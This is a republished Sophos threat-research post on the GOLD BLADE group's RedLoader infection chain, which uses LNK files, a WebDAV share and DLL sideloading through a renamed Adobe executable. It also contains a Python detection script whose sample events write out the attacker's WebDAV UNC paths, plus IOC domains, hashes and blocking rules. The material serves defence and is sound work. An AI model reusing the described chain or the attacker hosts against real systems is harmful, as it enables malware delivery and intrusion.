
GOLD BLADE Remote DLL Sideloading Attack Deploys RedLoader – Source: news.sophos.com


Source: news.sophos.com – Author: mindimcdowell

Threat Research

Attacks surged in July 2025 after the threat group updated its process to combine malicious LNK files and a recycled WebDAV technique

Sophos analysts are investigating a new infection chain for the GOLD BLADE cybercriminal group’s custom RedLoader malware, which initiates command and control (C2) communications. The threat actors use an LNK file to remotely execute a benign, signed executable, which in turn sideloads the RedLoader stage 1 DLL hosted on GOLD BLADE infrastructure. The threat actors previously used these techniques individually: the use of WebDAV to execute remotely hosted DLLs was observed in September 2024, and the sideloading of a renamed ADNotificationManager.exe file was observed in March 2025. The combination observed in July 2025, however, is an initial-execution method that has not been publicly reported.

Execution chain

Figure 1 illustrates the execution chain. The attack starts with a threat actor sending a well-crafted cover letter PDF to a target via a third-party job site such as ‘indeed.com’.

Figure 1: RedLoader execution chain, showing remote DLL sideloading via an attacker-controlled WebDAV server. (Source: Sophos)

  1. A malicious link in the PDF downloads a ZIP archive to the victim’s system. The archive contains an LNK file that masquerades as a PDF.
  2. The LNK file executes conhost.exe.
  3. conhost.exe uses the Windows WebDAV client to contact a Cloudflare Workers domain (automatinghrservices[.]workers[.]dev). A renamed, signed copy of the Adobe ADNotificationManager.exe executable, masquerading as a resume, is hosted on the attacker-controlled WebDAV server at \\dav[.]automatinghrservices[.]workers[.]dev@SSL\DavWWWRoot\CV-APP-2012-68907872.exe (the @SSL suffix makes the WebDAV redirector connect over HTTPS). The RedLoader stage 1 DLL (netutils.dll) resides in the same remote directory.
  4. When the renamed benign executable runs, it loads netutils.dll by name and, because the loader searches the application’s own directory before the system directory, picks up the malicious copy from the WebDAV share instead of the system DLL of the same name. This remote sideload marks the beginning of the RedLoader infection chain.
  5. RedLoader stage 1 creates a scheduled task named ‘BrowserQEBrowserQE_’ on the victim’s system and downloads a standalone executable for stage 2 from ‘live[.]airemoteplant[.]workers[.]dev’. The use of a standalone executable deviates from the activity observed in September 2024 and resembles the infection chain that Trend Micro reported in March 2024.
  6. The scheduled task uses pcalua.exe (the Program Compatibility Assistant launcher) and conhost.exe to execute RedLoader stage 2, a custom executable named ‘BrowserQE_.exe’. While this executable name is victim-specific, the SHA256 hash is consistent across all samples observed by Sophos analysts.
  7. RedLoader stage 2 communicates with its C2 server.

Mitigations

The July activity shows how threat actors combine earlier techniques to change their attack chain and bypass defenses. GOLD BLADE continues to rely heavily on LNK files that impersonate other file types. Organizations can mitigate this threat by deploying a Software Restriction Policy (SRP) Group Policy Object that blocks LNK files from running out of the directories malware commonly uses, such as C:\Users\*\Downloads\*.lnk, C:\Users\*\AppData\Local\*.lnk and C:\Users\*\AppData\Roaming\*.lnk. The same path rules can be expressed in AppLocker, which Microsoft recommends over SRP on current Windows releases; in either case, test the rules before enforcing them, because legitimate shortcuts in those directories are blocked as well.

The Sophos protections listed in Table 1 address this activity.

Name | Description
Evade_28k | Blocks specific versions of adnotificationmanager.exe, regardless of DLL name, from DLL sideloading
WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1 | Identifies suspicious child processes of conhost.exe where the process path is not ‘\Windows\splwow64.exe’, ‘\Windows\System32\WerFault.exe’, or ‘\Windows\System32\conhost.exe’
Troj/Agent-BLKU | Static detection for RedLoader stage 2

Table 1: Sophos countermeasures covering this threat.
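The execution chain above and the conhost.exe rule in Table 1 translate into a handful of process-creation checks. The following is an added example written for this page, not Sophos code or a Sophos rule export. It ports the headless-conhost allowlist from Table 1, adds a check for WebDAV UNC image paths and command-line arguments (with the Table 2 domains matched by suffix), and flags pcalua.exe proxy execution of a program outside \Windows. The input records are constructed Sysmon Event ID 1 fields; the conhost.exe argument, the on-disk location of BrowserQE_.exe and the parent of the scheduled-task launch are assumptions, as the article does not state them.

```python
"""Detection checks for the GOLD BLADE / RedLoader chain described above.

Added example, not Sophos code. Input records are constructed Sysmon
Event ID 1 (process creation) fields, not captured from a real host.
"""
import re
from dataclasses import dataclass

# Table 2 domains, with the defanging removed so they can be matched.
IOC_DOMAINS = {
    "automatinghrservices.workers.dev",
    "quiet.msftlivecloudsrv.workers.dev",
    "live.airemoteplant.workers.dev",
}

# Child images the Sophos WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1 rule
# treats as expected under conhost.exe; anything else is suspicious.
CONHOST_CHILD_ALLOWLIST = (
    r"\windows\splwow64.exe",
    r"\windows\system32\werfault.exe",
    r"\windows\system32\conhost.exe",
)

# Windows WebDAV redirector UNC syntax: \\host[@SSL][@port]\DavWWWRoot\...
# (@SSL selects HTTPS; the CV-APP-2012-68907872.exe path on the page uses it).
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[a-z0-9.-]+)(?P<ssl>@ssl)?(?:@(?P<port>\d+))?\\davwwwroot\\",
    re.IGNORECASE,
)

# "pcalua.exe -a <program>" starts <program> via the Program Compatibility
# Assistant launcher; the page says the scheduled task uses pcalua.exe.
PCALUA_TARGET = re.compile(r'(?:^|\s)-a\s+"?(?P<target>[^"]+\.exe)"?', re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str          # Sysmon Image: full path of the new process
    parent_image: str   # Sysmon ParentImage
    command_line: str   # Sysmon CommandLine


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def matches_ioc(host: str) -> bool:
    """True if host is an indicator domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def webdav_findings(ev: ProcessEvent) -> list:
    """Flag WebDAV UNC paths in the image path or command line (steps 2 to 4)."""
    hosts = {}  # host -> HTTPS?; dict dedupes and keeps first-seen order
    for m in WEBDAV_UNC.finditer(ev.image + " " + ev.command_line):
        hosts.setdefault(m.group("host").lower(), m.group("ssl") is not None)
    return [Finding("remote-webdav-execution",
                    f"{host} over {'https' if ssl else 'http'}"
                    + (" [matches Table 2 indicator]" if matches_ioc(host) else ""))
            for host, ssl in hosts.items()]


def conhost_child_findings(ev: ProcessEvent) -> list:
    """Port of the Table 1 rule: a conhost.exe child outside the allowlist."""
    if basename(ev.parent_image) != "conhost.exe":
        return []
    if any(ev.image.lower().endswith(ok) for ok in CONHOST_CHILD_ALLOWLIST):
        return []
    return [Finding("headless-conhost-child", f"conhost.exe spawned {ev.image}")]


def pcalua_findings(ev: ProcessEvent) -> list:
    """Flag pcalua.exe proxying a program that is not under \\Windows (step 6)."""
    if basename(ev.image) != "pcalua.exe":
        return []
    m = PCALUA_TARGET.search(ev.command_line)
    target = m.group("target") if m else ev.command_line
    if "\\windows\\" in target.lower():
        return []  # assumption: launches of Windows binaries are expected noise
    return [Finding("pcalua-proxy-execution", f"pcalua.exe launched {target}")]


def scan(events) -> list:
    findings = []
    for ev in events:
        findings += webdav_findings(ev) + conhost_child_findings(ev) + pcalua_findings(ev)
    return findings


# Constructed events walking Figure 1 (fields are image, parent_image, command_line).
SAMPLE_EVENTS = [
    # Step 2: the LNK starts conhost.exe; passing the remote EXE as its argument is an assumption.
    ProcessEvent(r"C:\Windows\System32\conhost.exe", r"C:\Windows\explorer.exe",
                 r'conhost.exe "\\dav.automatinghrservices.workers.dev@SSL\DavWWWRoot\CV-APP-2012-68907872.exe"'),
    # Steps 3 and 4: conhost.exe runs the renamed ADNotificationManager.exe straight off the WebDAV share.
    ProcessEvent(r"\\dav.automatinghrservices.workers.dev@SSL\DavWWWRoot\CV-APP-2012-68907872.exe",
                 r"C:\Windows\System32\conhost.exe",
                 r"\\dav.automatinghrservices.workers.dev@SSL\DavWWWRoot\CV-APP-2012-68907872.exe"),
    # Benign: WerFault.exe under conhost.exe is allowlisted by the Table 1 rule.
    ProcessEvent(r"C:\Windows\System32\WerFault.exe", r"C:\Windows\System32\conhost.exe",
                 r"C:\Windows\System32\WerFault.exe -u -p 4242"),
    # Step 6: the scheduled task runs stage 2 through pcalua.exe (stage 2 path is assumed).
    ProcessEvent(r"C:\Windows\System32\pcalua.exe", r"C:\Windows\System32\svchost.exe",
                 r'"C:\Windows\System32\pcalua.exe" -a "C:\Users\victim\AppData\Roaming\BrowserQE_.exe"'),
    # Benign control event.
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.detail}")
```

Running the script prints four findings: the WebDAV host for the first two events, the unallowlisted conhost.exe child for the second, and the pcalua.exe launch for the fourth; the WerFault.exe and notepad.exe events produce nothing. The WebDAV check only matches the redirector's UNC form; a share mounted to a drive letter with net use would appear as a local path and needs the drive mapping event instead.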

To mitigate exposure to this malware, organizations can use available controls to review and restrict access using the indicators listed in Table 2. The domains may host malicious content, so consider the risks before opening them in a browser. Note that all three domains are subdomains of workers[.]dev, the Cloudflare Workers platform; block the listed hostnames rather than the parent domain, which also serves legitimate applications.

Indicator | Type | Context
automatinghrservices[.]workers[.]dev | Domain name | GOLD BLADE C2 server
quiet[.]msftlivecloudsrv[.]workers[.]dev | Domain name | GOLD BLADE C2 server
live[.]airemoteplant[.]workers[.]dev | Domain name | GOLD BLADE C2 server
netutils.dll | Filename | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading
d302836c7df9ce8ac68a06b53263e2c685971781a48ce56b3b5a579c5bba10cc | SHA256 hash | RedLoader stage 1 deployed by GOLD BLADE via remote DLL sideloading
f5203c7ac07087fd5029d83141982f0a5e78f169cdc4ab9fc097cc0e2981d926 | SHA256 hash | RedLoader stage 2 deployed by GOLD BLADE
369acb06aac9492df4d174dbd31ebfb1e6e0c5f3 | SHA1 hash | RedLoader stage 2 deployed by GOLD BLADE

Table 2: Indicators for this threat.

Original Post URL: https://news.sophos.com/en-us/2025/07/29/gold-blade-remote-dll-sideloading-attack-deploys-redloader/

Category & Tags: Threat Research,.lnk,cybercrime,DLL sideloading,featured,GOLD BLADE,RedLoader,Sophos X-Ops,webdav
